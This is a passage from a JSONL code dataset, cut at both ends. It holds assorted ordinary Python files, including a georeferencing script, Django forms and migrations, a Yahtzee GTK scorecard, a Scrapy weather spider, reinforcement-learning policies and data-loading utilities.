enough information: need CRS.\")\n if not geotransform and not crs:\n raise ValueError(\"Not enough information: need CRS and \"\n \"geotransform or a profile dictionary \"\n \"containing both values.\")\n profile = {\"crs\": crs, \"transform\": geotransform}\n\n\n # The profile might be a json\n if isinstance(profile, str):\n profile = json.loads(profile)\n\n # Get the geotransform the profile\n if \"geotransform\" in profile:\n transform = profile[\"geotransform\"]\n elif \"transform\" in profile:\n transform = profile[\"transform\"]\n else:\n raise KeyError(\"Geotransformation not found.\")\n\n # Now reformat the crs\n crs = profile[\"crs\"]\n spatial_ref = osr.SpatialReference()\n try:\n spatial_ref.ImportFromEPSG(crs)\n except TypeError:\n try: \n code = spatial_ref.ImportFromProj4(crs)\n assert code == 0\n except AssertionError:\n try:\n code = spatial_ref.ImportFromWkt(crs)\n assert code == 0\n except AssertionError:\n print(\"CRS not properly formatted for proj4, epsg, or \"\n \"wkt formats.\")\n raise\n crs = spatial_ref.ExportToWkt()\n\n # Now set these attributes # <-------------------------------------------- In the case of (cannot lock file, resource temporarily unavailable?)\n with h5py.File(file, \"r+\") as h5:\n h5.attrs[\"Projection\"] = crs\n h5.attrs[\"GeoTransform\"] = transform\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"revruns/scratch/rrgeoref.py","file_name":"rrgeoref.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"277625675","text":"#! -*- coding:utf-8 -*-\n\n'''\n@Author: ZM\n@Date and Time: 2021/1/3 20:08\n@File: get_dataset.py\n'''\n\nimport random\nfrom pathlib import Path\n\ndef get_dataset(root_dir=r'D:\\datasets\\Tencent-Verification-Code', train_val_split=0.8):\n root_path = Path(root_dir)\n\n X, Y = [], []\n for sub_path in root_path.iterdir():\n dir = sub_path.as_posix()\n label = sub_path.name[:4]\n X.append(dir)\n Y.append(label)\n\n total_samples = len(Y)\n index = [i for i in range(total_samples)]\n random.shuffle(index)\n\n new_X, new_Y = [], []\n for i in index:\n new_X.append(X[i])\n new_Y.append(Y[i])\n \n X, Y = new_X, new_Y\n\n num_train = int(total_samples * train_val_split)\n\n return (X[:num_train], Y[:num_train]), (X[num_train:], Y[num_train:])\n","sub_path":"n_fc/get_dataset.py","file_name":"get_dataset.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508248091","text":"from django import forms\n\nfrom .models import Products\n\nclass ProductsForm(forms.Form):\n mytipo = (\n ('GM', 'Console Game'),\n ('YGOC', 'Yugioh Card'),\n ('MGC', 'Magic Card'),\n ('PKMNC', 'Pokémon Card'),\n )\n\n mycardconditions = (\n ('NM','NM'),\n ('LP','LP'),\n ('MP','MP'),\n ('HP','HP'),\n ('D','D'),\n )\n\n myGameconditions = (\n ('Nw','New'),\n ('LN','Like-New'),\n ('US','Used'),\n )\n\n title = forms.CharField(max_length=120, widget=forms.TextInput(attrs={'placeholder':'Digite o nome de seu produto'}))\n price =forms.DecimalField(min_value=0, max_digits=100, decimal_places=2, initial=0.00)\n images = forms.ImageField()\n tipo = forms.ChoiceField(choices= mytipo)\n country = forms.CharField(max_length=120)\n quantity = forms.IntegerField()\n Language = forms.CharField(max_length=120)\n Card_condition = forms.ChoiceField(choices= mycardconditions)\n Game_condition = forms.ChoiceField(choices= myGameconditions)","sub_path":"products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"187244074","text":"from datetime import timedelta\n\nfrom config import settings\nfrom lib.db import DB\n\nclass Title(object):\n _all = []\n\n @classmethod\n def find(cls, lccn):\n for t in cls.all():\n if t.lccn == lccn:\n return t\n\n return NoTitle\n\n @classmethod\n def all(cls):\n if len(cls._all) == 0:\n cls.reload_titles()\n\n return cls._all\n\n @classmethod\n def reload_titles(cls):\n cls._all = []\n rows = DB.fetchall(\"SELECT title, lccn, embargoed, rights FROM titles\")\n for row in rows:\n cls._all.append(Title(**row))\n\n def __init__(self, title, lccn, embargoed, rights):\n self.title = title\n self.lccn = lccn\n self.embargoed = embargoed\n self.embargo_delay = timedelta(days=settings.EMBARGO_DAYS)\n self.copyright = rights\n self.valid = True\n\nNoTitle = Title(\"N/A\", \"N/A\", \"True\", \"N/A\")\nNoTitle.valid = False\nNoTitle.embargo_delay = timedelta(days=1000000)\n","sub_path":"src/lib/models/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"19132192","text":"from player import Player\r\nfrom project.player import Player\r\n\r\n\r\nclass Guild:\r\n def __init__(self, name):\r\n self.guild_name = name\r\n self.list_of_players = []\r\n\r\n def assign_player(self, player):\r\n if player in self.list_of_players:\r\n return f\"Player {player.name} is already in the guild.\"\r\n elif player.guild != \"Unaffiliated\":\r\n return f\"Player {player.name} is in another guild.\"\r\n\r\n self.list_of_players.append(player)\r\n player.guild = self.guild_name\r\n return f\"Welcome player {player.name} to the guild {self.guild_name}\"\r\n\r\n def kick_player(self, player_name):\r\n if player_name not in self.list_of_players:\r\n return f\"Player {player_name} is not in the guild.\"\r\n\r\n self.list_of_players.remove(player_name)\r\n Player.guild = \"Unaffiliated\"\r\n return f\"Player {player_name} has been removed from the guild.\"\r\n\r\n # def guild_info(self):\r\n # res = f'Guild: {self.guild_name}\\n'\r\n # res2 = []\r\n # for play_er in self.list_of_players:\r\n # res2.append(f\"{Player.player_info(play_er)}\")\r\n # res += [\"\\n\".join(str(el)) for el in res2]\r\n # return res\r\n def guild_info(self):\r\n result = f\"Guild: {self.guild_name}\\n\"\r\n for play_er in self.list_of_players:\r\n result += f\"{play_er.player_info()}\"\r\n return result\r\n\r\n\r\n# player = Player(\"George\", 50, 100)\r\n# print(player.add_skill(\"Shield Break\", 20))\r\n# print(player.player_info())\r\n# guild = Guild(\"UGT\")\r\n# print(guild.assign_player(player))\r\n# print(guild.guild_info())\r\n","sub_path":"defining_classes_exercise/guild_system/project/project/project/guild.py","file_name":"guild.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"208282242","text":"from typing import Type, Dict\nimport numpy as np\n\nfrom .core_aggregate import BaseAggregateChart\nfrom ....assets.numba_kernels import calc_value_counts, calc_groupby\nfrom ....datatile import DataTile\nfrom ....layouts import chart_view\nfrom ....assets import geo_json_mapper\n\nclass BaseChoropleth(BaseAggregateChart):\n\n chart_type: str = 'choropleth'\n reset_event = None\n _datatile_loaded_state: bool = False\n geo_mapper: Dict[str, str] = {}\n nan_color = 'white'\n use_data_tiles = True\n \n @property\n def datatile_loaded_state(self):\n return self._datatile_loaded_state\n\n @datatile_loaded_state.setter\n def datatile_loaded_state(self, state: bool):\n self._datatile_loaded_state = state\n # if self.add_interaction:\n # if state:\n # self.filter_widget.bar_color = '#8ab4f7'\n # else:\n # self.filter_widget.bar_color = '#d3d9e2'\n\n def __init__(self, x, y=None, data_points=100, add_interaction=True, aggregate_fn='count', width=800, height=400, step_size=None, step_size_type=int, geoJSONSource=None, geoJSONProperty=None, geo_color_palette=None, **library_specific_params):\n '''\n Description:\n \n -------------------------------------------\n Input:\n x\n geoJSONSource\n geoJSONProperty\n y\n data_points\n add_interaction \n geo_color_palette\n aggregate_fn\n width\n height\n step_size\n step_size_type\n nan_color\n x_label_map\n y_label_map\n **library_specific_params\n -------------------------------------------\n\n Ouput:\n\n '''\n self.x = x\n self.y = y\n self.data_points = data_points\n self.add_interaction = add_interaction\n self.aggregate_fn = aggregate_fn\n\n if geoJSONSource is None:\n print(\"geoJSONSource is required for the choropleth map\")\n else:\n self.geoJSONSource = geoJSONSource\n \n self.geo_color_palette = geo_color_palette\n self.geoJSONProperty = geoJSONProperty\n self.geo_mapper = geo_json_mapper(self.geoJSONSource, self.geoJSONProperty)\n self.height = height\n self.width = width\n\n self.stride = step_size\n self.stride_type = step_size_type\n\n self.library_specific_params = library_specific_params\n if 'nan_color' in self.library_specific_params:\n self.nan_color = self.library_specific_params['nan_color']\n self.library_specific_params.pop('nan_color')\n \n\n def initiate_chart(self, dashboard_cls):\n '''\n Description:\n \n -------------------------------------------\n Input:\n data: cudf DataFrame\n -------------------------------------------\n\n Ouput:\n\n '''\n self.min_value = dashboard_cls._data[self.x].min()\n self.max_value = dashboard_cls._data[self.x].max()\n if self.stride is None:\n if self.max_value < 1 and self.stride_type == int:\n self.stride_type = float\n self.stride = self.stride_type( (self.max_value - self.min_value)/self.data_points )\n\n self.calculate_source(dashboard_cls._data)\n self.generate_chart()\n self.apply_mappers()\n\n self.add_events(dashboard_cls)\n \n def view(self):\n return chart_view(self.chart, width=self.width)\n\n def calculate_source(self, data, patch_update=False):\n '''\n Description:\n \n -------------------------------------------\n Input:\n\n -------------------------------------------\n\n Ouput:\n '''\n if self.y == self.x or self.y is None: \n # it's a histogram\n df = calc_value_counts(data[self.x].to_gpu_array(), self.data_points)\n else:\n df = calc_groupby(self, data)\n\n dict_temp = {'X':list(df[0].astype(df[0].dtype)), 'Y':list(df[1].astype(df[1].dtype))}\n \n self.format_source_data(dict_temp, patch_update)\n \n \n def get_selection_callback(self, dashboard_cls):\n '''\n Description: generate callback for choropleth selection evetn\n -------------------------------------------\n Input:\n\n -------------------------------------------\n\n Ouput:\n '''\n def selection_callback(old, new):\n if dashboard_cls._active_view != self.name:\n dashboard_cls._reset_current_view(new_active_view=self)\n dashboard_cls._calc_data_tiles(cumsum=False)\n dashboard_cls._query_datatiles_by_indices(old, new)\n\n return selection_callback\n\n def compute_query_dict(self, query_str_dict):\n '''\n Description: \n\n -------------------------------------------\n Input:\n query_dict = reference to dashboard.__cls__.query_dict\n -------------------------------------------\n\n Ouput:\n '''\n list_of_indices = self.get_selected_indices()\n if len(list_of_indices) == 0 or list_of_indices == ['']:\n query_str_dict.pop(self.name, None)\n elif len(list_of_indices) == 1:\n query_str_dict[self.name] = self.x+\"==\"+str(list_of_indices[0])\n else:\n indices_string = \",\".join(map(str, list_of_indices))\n query_str_dict[self.name] = self.x+\" in (\"+indices_string+\")\"\n\n \n def add_events(self, dashboard_cls):\n '''\n Description: \n\n -------------------------------------------\n Input:\n\n -------------------------------------------\n\n Ouput:\n '''\n if self.add_interaction:\n self.add_selection_event(self.get_selection_callback(dashboard_cls))\n if self.reset_event is not None:\n self.add_reset_event(dashboard_cls)\n\n\n\n def add_reset_event(self, dashboard_cls):\n '''\n Description: \n\n -------------------------------------------\n Input:\n\n -------------------------------------------\n\n Ouput:\n '''\n def reset_callback(event):\n if dashboard_cls._active_view != self.name:\n #reset previous active view and set current chart as active view\n dashboard_cls._reset_current_view(new_active_view=self)\n dashboard_cls._reload_charts() \n\n #add callback to reset chart button\n self.add_event(self.reset_event,reset_callback)\n\n def get_selected_indices(self):\n '''\n Description:\n \n -------------------------------------------\n Input:\n\n -------------------------------------------\n\n Ouput:\n '''\n print('function to be overridden by library specific extensions')\n return []\n\n def add_selection_event(self, callback):\n '''\n Description:\n \n -------------------------------------------\n Input:\n\n -------------------------------------------\n\n Ouput:\n '''\n\n print('function to be overridden by library specific extensions')","sub_path":"python/cuXfilter/charts/core/aggregate/core_aggregate_choropleth.py","file_name":"core_aggregate_choropleth.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192915215","text":"import logging\nimport os\nimport importlib.util\nimport argparse\nimport sys\n\nparser_config = argparse.ArgumentParser()\nparser_config.add_argument(\"-c\", \"--config_path\", help=\"path to configuration file\")\nparser_config.add_argument(\"-m\", \"--module\", help=\"Only for tests\")\nparser_config.add_argument(\"-f\", \"--test_files\", metavar=\"VALUE\", nargs='*', help=\"Only for tests\")\nparser_config.add_argument('-v', \"--unitest_verbose_mode\", nargs='?', help=\"to enable verbose mode of unittest. Only for tests\")\nargs_config = parser_config.parse_args()\n\nlogging.basicConfig(stream=sys.stdout,\n level=logging.INFO,\n format=\"%(asctime)s - %(pathname)s - %(levelname)s - %(message)s\")\n\n\n_config = dict(\n # JOBLIB SETTINGS\n # number of parallel jobs in some tasks as OCR\n n_jobs=4,\n\n # API SETTINGS\n # max file size in bytes\n max_content_length=512 * 1024 * 1024,\n # application port\n api_port=int(os.environ.get('DOCREADER_PORT', '1231')),\n static_files_dirs={},\n recursion_deep_attachments=10,\n recursion_deep_subparagraphs=30,\n import_path_init_api_args=\"dedoc.api.api_args\",\n #\n logger=logging.getLogger()\n\n # path to external static files (you may get file from this directory with url\n # host:port/xturnal_file?fname=\n # for example if you want send files from /tmp/dedoc directory uncomment the line below\n # external_static_files_path=\"/tmp/dedoc\",\n\n\n)\n\n\nclass Configuration(object):\n \"\"\"\n Pattern Singleton for configuration service\n INFO: Configuration class and config are created once at the first call\n \"\"\"\n __instance = None\n __config = None\n\n @classmethod\n def getInstance(cls) -> \"Configuration\":\n \"\"\"\n Actual object creation will happen when we use Configuration.getInstance()\n \"\"\"\n if not cls.__instance:\n cls.__instance = Configuration()\n\n return cls.__instance\n\n def __initConfig(self):\n if args_config.config_path is not None:\n spec = importlib.util.spec_from_file_location(\"config_module\", args_config.config_path)\n config_module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(config_module)\n self.__config = config_module._config\n else:\n self.__config = _config\n\n def getConfig(self) -> dict:\n if self.__config is None:\n self.__initConfig()\n return self.__config\n\n\ndef get_config():\n return Configuration().getConfig()\n","sub_path":"dedoc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"118404680","text":"import numpy as np\nimport bisect\nimport gptd\nimport maze\n\n\nclass SimplePolicy:\n\n def __init__(self, probas):\n self.probas = probas\n\n def draw_action(self, state):\n udraw = np.random.uniform(0, 1)\n cum = np.cumsum(self.probas)\n spot = bisect.bisect(cum, udraw)\n # Explore\n if spot == 8:\n spot = np.random.randint(0, 7)\n return spot\n\n\nclass GreedyImprovedPolicy:\n\n def __init__(self, alpha, C, xdict, kernel, eps, pace=0.1):\n self.alpha = alpha\n self.C = C\n self.eps = eps\n self.pace = pace\n self.xdict = xdict\n self.kernel = kernel\n\n def draw_action(self, state):\n udraw = np.random.uniform(0, 1)\n # Explore\n if udraw > self.eps:\n return np.random.randint(0, 7)\n # Greedy with respect to next values\n else:\n next_states = [maze.Maze.move_coords(state, a, self.pace) for a in range(0, 8)]\n values = [gptd.compute_state_mean_variance(self.xdict, ns, self.alpha, self.C, self.kernel)[0] for ns in next_states]\n return np.argmax(values)\n\n","sub_path":"GPTD/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"366413127","text":"import gi,sys,time,random\ngi.require_version(\"Gtk\",\"3.0\")\nfrom gi.repository import Gtk,Gio,GdkPixbuf\nfrom DiceEnsemble import DiceEnsemble\nfrom YahtzeeBase import Roll\n\nUPPER_KEYS = (\"Ones\",\n \"Twos\",\n \"Threes\",\n \"Fours\",\n \"Fives\",\n \"Sixes\")\n\nLOWER_KEYS = (\"Three of a Kind\",\n \"Four of a Kind\",\n \"Full House\",\n \"Small Straight\",\n \"Large Straight\",\n \"Yahtzee\",\n \"Chance\")\n\nUPPER_SPECIAL_KEYS = (\"Upper Subtotal\",\n \"Bonus\",\n \"Upper Total\")\n\nLOWER_SPECIAL_KEYS = (\"Lower Subtotal\",\n \"Bonus Yahtzee\",\n \"Lower Total\",\n \"Total\")\n\nclass ScoreCard(object):\n\n def __init__(self,window):\n\n self.window = window\n\n self.n_rolls = 0\n self.n_bonus_yahtzees = -1\n self.key = UPPER_KEYS[0]\n\n self.dice_values = {}\n self.values = {}\n self.radio_buttons = {}\n self.score_labels = {}\n self.special_labels = {}\n \n self.dice = DiceEnsemble()\n\n for key in UPPER_KEYS+LOWER_KEYS:\n self.values [key] = -1\n self.dice_values[key] = -1\n if key == UPPER_KEYS[0]:\n self.radio_buttons[key] = Gtk.RadioButton(group=None,label=key)\n else:\n self.radio_buttons[key] = Gtk.RadioButton(group=self.radio_buttons[UPPER_KEYS[0]],label=key)\n self.connect_radio_button(key)\n self.score_labels[key] = Gtk.Label(\"(0)\")\n\n for key in UPPER_SPECIAL_KEYS+LOWER_SPECIAL_KEYS:\n self.special_labels[key] = Gtk.Label(key)\n self.score_labels [key] = Gtk.Label(\"0\")\n\n @property\n def upper_subtotal(self):\n return sum([self.values[key] for key in UPPER_KEYS if self.values[key]>0])\n\n @property\n def bonus(self):\n return 0 if self.upper_subtotal < 63 else 35\n\n @property\n def upper_total(self):\n return self.upper_subtotal + self.bonus\n\n @property\n def lower_subtotal(self):\n return sum([self.values[key] for key in LOWER_KEYS if self.values[key]>0])\n\n @property\n def bonus_yahtzee(self):\n return 100*self.n_bonus_yahtzees if self.n_bonus_yahtzees > 0 else 0\n\n @property\n def lower_total(self):\n return self.lower_subtotal + self.bonus_yahtzee\n\n @property\n def total(self):\n return self.upper_total + self.lower_total\n\n def get_special(self,key):\n key = key.lower().replace(\" \",\"_\")\n return getattr(self,key)\n\n def connect_radio_button(self,key):\n self.radio_buttons[key].connect(\"toggled\",self._on_radio_toggled(key))\n\n def _on_radio_toggled(self,key):\n def f(widget):\n if self.radio_buttons[key].get_active():\n self.key = key\n else:\n pass\n return f\n\n def attach(self,grid,iLine):\n for i,key in enumerate(UPPER_KEYS):\n grid.attach(self.radio_buttons[key],0,iLine+i,1,1)\n grid.attach(self.score_labels [key],1,iLine+i,1,1)\n for i,key in enumerate(LOWER_KEYS):\n grid.attach(self.radio_buttons[key],2,iLine+i,1,1)\n grid.attach(self.score_labels [key],3,iLine+i,1,1)\n jLine = iLine+max(len(LOWER_KEYS),len(UPPER_KEYS))+1\n for i,key in enumerate(UPPER_SPECIAL_KEYS):\n grid.attach(self.special_labels[key],0,jLine+i,1,1)\n grid.attach(self.score_labels [key],1,jLine+i,1,1)\n for i,key in enumerate(LOWER_SPECIAL_KEYS):\n grid.attach(self.special_labels[key],2,jLine+i,1,1)\n grid.attach(self.score_labels [key],3,jLine+i,1,1)\n return jLine+max(len(LOWER_SPECIAL_KEYS),len(UPPER_SPECIAL_KEYS))\n\n def roll(self):\n self.n_rolls += 1\n self.window.roll_button.set_n_rolls(self.n_rolls)\n R = Roll(*self.window.dice.values)\n for key in UPPER_KEYS+LOWER_KEYS:\n if self.values[key] < 0:\n self.score_labels[key].set_label(\"(%d)\"%R[key])\n self.dice_values[key] = R[key]\n\n def play(self):\n for key in LOWER_KEYS+UPPER_KEYS:\n if self.values[key] < 0:\n self.score_labels[key].set_label(\"(0)\")\n if self.radio_buttons[key].get_active() and self.n_rolls > 0:\n self.values[key] = self.dice_values[key]\n self.score_labels[key].set_label(str(self.values[key]))\n if key==\"Yahtzee\":\n self.n_bonus_yahtzees += 1\n for key in UPPER_SPECIAL_KEYS+LOWER_SPECIAL_KEYS:\n self.score_labels[key].set_label(str(self.get_special(key)))\n self.n_rolls = 0\n self.window.roll_button.level_bar.set_value(self.n_rolls)\n \n\n def clear(self):\n pass\n","sub_path":"Yahtzee/ScoreCard.py","file_name":"ScoreCard.py","file_ext":"py","file_size_in_byte":4471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"525758119","text":"import glob\n\nimport yaml_config as yc\nfrom pavilion.result import parsers\n\n\nclass Filecheck(parsers.ResultParser):\n \"\"\"Checks the working directory for a given file.\n The parser will tell the user if the filename exists or not. \"\"\"\n\n def __init__(self):\n super().__init__(\n name='filecheck',\n description=\"Checks working directory for a given file. Globs are\"\n \"accepted.\",\n config_elems=[\n yc.StrElem(\n 'filename', required=True,\n help_text=\"Filename to find in working directory.\"\n )\n ]\n )\n\n def __call__(self, test, file, filename=None):\n\n return bool(glob.glob((test.path/'build/').as_posix() + filename))\n","sub_path":"lib/pavilion/plugins/results/filecheck.py","file_name":"filecheck.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547763792","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.optimize\nimport csv\nimport os\nfrom datetime import date\nfrom pymongo import MongoClient, ASCENDING\nfrom scipy.optimize import leastsq\nclient = MongoClient('mongodb://localhost:27017/')\n\ndb_corona = client.corona\ncol_system = db_corona.system_info\ncol_case = db_corona.case_count\ncol_ridership = db_corona.ridership\n\ncol_occu = db_corona.census_race\n\nrl_system = col_system.find({})\nfor each_system in rl_system:\n system_name = each_system[\"name\"]\n county_FIPS = each_system[\"county_FIPS\"]\n if county_FIPS == None:\n continue\n\n rl_occu = col_occu.find_one({\"Geo_FIPS\": str(int(county_FIPS))})\n # print(rl_occu)\n try:\n a1 = rl_occu[\"white_pop\"]\n \n a2 = rl_occu[\"asian_pop\"]\n\n a0 = rl_occu[\"total_race_pop\"]\n except:\n print(county_FIPS)\n print('\"', system_name ,'\"', a1, a2, a0)","sub_path":"scr/corr_analysis/print_race.py","file_name":"print_race.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"115412429","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom ..items import CityItem\nfrom scrapy.selector import Selector\nimport re\nfrom scrapy.http import Request\nfrom pypinyin import lazy_pinyin\n\nclass TianqispiderSpider(scrapy.Spider):\n name = 'tianqispider'\n # allowed_domains = ['weather.com.cn']\n provinces = '河北、山西、吉林、辽宁、黑龙江、陕西、甘肃、青海、山东省、福建、浙江、台湾、河南、湖北、湖南、江西、江苏、安徽、广东、海南、四川、贵州、云南、' \\\n '北京、上海、天津、重庆、' \\\n '内蒙古、新疆、宁夏、广西、西藏'\n provinces = provinces.split('、')\n provinces = list(map(lazy_pinyin, provinces))\n provinces = [''.join(p) for p in provinces]\n provinces.append('shaanxi') #陕西\n start_urls = ['http://www.weather.com.cn/{}/index.shtml'.format(p) for p in provinces]\n #http://www.weather.com.cn/neimenggu/index.shtml\n\n def parse(self, response):\n selector = Selector(response)\n cities = selector.xpath('//div[@class=\"forecastBox\"]/dl')\n for city in cities:\n city_url = city.xpath('./dt/a/@href').extract()[0]\n city_name = city.xpath('./dt/a/text()').extract()[0]\n yield Request(city_url,\n callback=self.parse_city,\n meta={'city_name': city_name})\n\n def parse_city(self,response):\n selector = Selector(response)\n item = CityItem()\n item['city_name'] = response.meta['city_name']\n item['high_temperature'] = selector.xpath('//ul[@class=\"t clearfix\"]/li[1]/p[2]/span/text()').extract()[0]\n item['low_temperature'] = selector.xpath('//ul[@class=\"t clearfix\"]/li[1]/p[2]/i/text()').extract()[0]\n item['city_province'] = selector.xpath('//div[@class=\"crumbs fl\"]/a[1]/text()').extract()[0]\n item['city_weather'] = selector.xpath('//ul[@class=\"t clearfix\"]/li[1]/p/text()').extract()[0]\n yield item\n","sub_path":"tianqi/tianqi/spiders/tianqispider.py","file_name":"tianqispider.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"249847113","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.conf import settings\nimport image_cropping.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PhotoInstagram',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),\n ('image_field', image_cropping.fields.ImageCropField(upload_to='image/')),\n ('cropping', image_cropping.fields.ImageRatioField('image_field', '120x100', free_crop=False, verbose_name='cropping', size_warning=False, adapt_rotation=False, hide_image_field=False, allow_fullsize=True, help_text=None)),\n ('cropping_free', image_cropping.fields.ImageRatioField('image_field', '300x230', free_crop=True, verbose_name='cropping free', size_warning=True, adapt_rotation=False, hide_image_field=False, allow_fullsize=False, help_text=None)),\n ('title', models.CharField(null=True, blank=True, max_length=120)),\n ('created', models.DateTimeField(auto_now=True)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, related_name='uploader')),\n ],\n ),\n ]\n","sub_path":"instaapp/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"104813841","text":"import random\nfrom itertools import permutations\nfrom util import Stack, Queue\nclass User:\n def __init__(self, name):\n self.name = name\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n print(\"WARNING: You cannot be friends with yourself\")\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n print(\"WARNING: Friendship already exists\")\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n def populate_graph(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n Creates that number of users and a randomly distributed friendships\n between those users.\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n # !!!! IMPLEMENT ME\n # Add users\n ## use num_users\n user_ids = []\n for user in range(num_users + 1):\n self.add_user(random.randint(1, num_users * 100))\n for user in self.users:\n user_ids.append(user)\n perms = list(permutations(user_ids, 2))\n final_list = random.sample(perms, num_users * avg_friendships // 2)\n for pair in final_list:\n self.add_friendship(pair[0], pair[1])\n def get_all_social_paths(self, user_id):\n \"\"\"\n Takes a user's user_id as an argument\n Returns a dictionary containing every user in that user's\n extended network with the shortest friendship path between them.\n The key is the friend's ID and the value is the path.\n \"\"\"\n visited = {} # Note that this is a dictionary, not a set\n visited[user_id] = [user_id]\n paths = []\n for friend in self.get_friendships(user_id):\n paths.append(self.dft_search(friend))\n extended_network = []\n for path in paths:\n for i in path:\n for j in i:\n if j not in extended_network:\n extended_network.append(j)\n extended_network_paths = []\n for end_user_id in extended_network:\n extended_network_paths.append(self.bft_search(user_id, end_user_id))\n print(extended_network_paths)\n for i in extended_network_paths:\n for extended_network in i:\n visited[extended_network[-1]] = extended_network\n return visited\n def get_friendships(self, user_id):\n return self.friendships[user_id]\n def dft_search(self, user_id):\n # returns extended network\n s = Stack()\n visited = {}\n connections = []\n if s.size() == 0:\n s.push([user_id])\n while s.size() > 0:\n current_path = s.pop()\n current_user_id = current_path[-1]\n if current_user_id not in visited:\n visited[current_user_id] = current_path\n if len(self.get_friendships(current_user_id)) == 1:\n connections.append(current_path)\n else:\n for friend in self.get_friendships(current_user_id):\n if friend not in visited:\n new_path = current_path + [friend]\n visited[friend] = new_path\n s.push(new_path)\n return connections\n def bft_search(self, start_user_id, end_user_id):\n # return shortest path\n q = Queue()\n visited = set()\n paths = []\n q.enqueue([start_user_id])\n while q.size() > 0:\n path = q.dequeue()\n current_friend = path[-1]\n if current_friend not in visited:\n visited.add(current_friend)\n for friend_of_friend in self.get_friendships(current_friend):\n new_path = path + [friend_of_friend]\n q.enqueue(new_path)\n if current_friend == end_user_id:\n paths.append(path)\n shortest_path = [path for path in paths if len(path) == min(len(x) for x in paths)]\n return shortest_path\nif __name__ == '__main__':\n sg = SocialGraph()\n sg.populate_graph(10, 2)\n print(sg.friendships)\n connections = sg.get_all_social_paths(1)\n print(connections)","sub_path":"projects/social/helping_Arin.py","file_name":"helping_Arin.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"45696133","text":"import cx_Oracle\r\nimport xlrd\r\n\r\n# --------------------------------------\r\n# Reio: Read Excel import into Oracle Database\r\n# --------------------------------------\r\n'''\r\ncreate table NIIC_TEMP\r\n(\r\n cust_no VARCHAR2(20),\r\n CustomerName VARCHAR2(100),\r\n country VARCHAR2(20),\r\n Status VARCHAR2(20),\r\n Ebanking VARCHAR2(20), \r\n RM VARCHAR2(50)\r\n)\r\n'''\r\n# for database tables: NIIC_TEMP\r\n\r\nclass REIOD(object):\r\n def ImportFXdata(self,filename,tablename):\r\n \r\n data = xlrd.open_workbook(filename)\r\n table = data.sheets()[0]\r\n nrows = table.nrows\r\n drows=[]\r\n for i in range(nrows):\r\n if i+1')\r\n\tEN = Field(lower=True,tokenize=tokenize,eos_token='',init_token='')\r\n\r\n\ttrain_ds = TabularDataset(train_path,'tsv',[('en',EN),('de',DE)],skip_header=True)\r\n\tval_ds = TabularDataset(val_path,'tsv',[('en',EN),('de',DE)],skip_header=True)\r\n\r\n\ttrain_iter = BucketIterator(train_ds,\r\n\t bs,\r\n\t sort_key=lambda x: interleave_keys(len(x.en),len(x.de)),\r\n\t shuffle=True,\r\n\t sort_within_batch=True)\r\n\tvalid_iter = BucketIterator(val_ds,\r\n\t bs,\r\n\t sort_key=lambda x: interleave_keys(len(x.en),len(x.de)),\r\n\t shuffle=True,\r\n\t sort_within_batch=True)\r\n\r\n\tDE.build_vocab(train_ds.de)\r\n\tEN.build_vocab(train_ds.en)\r\n\r\n\treturn train_iter, valid_iter, DE, EN\r\n\r\ndef load_WMT14(bs):\r\n\tdata_path = 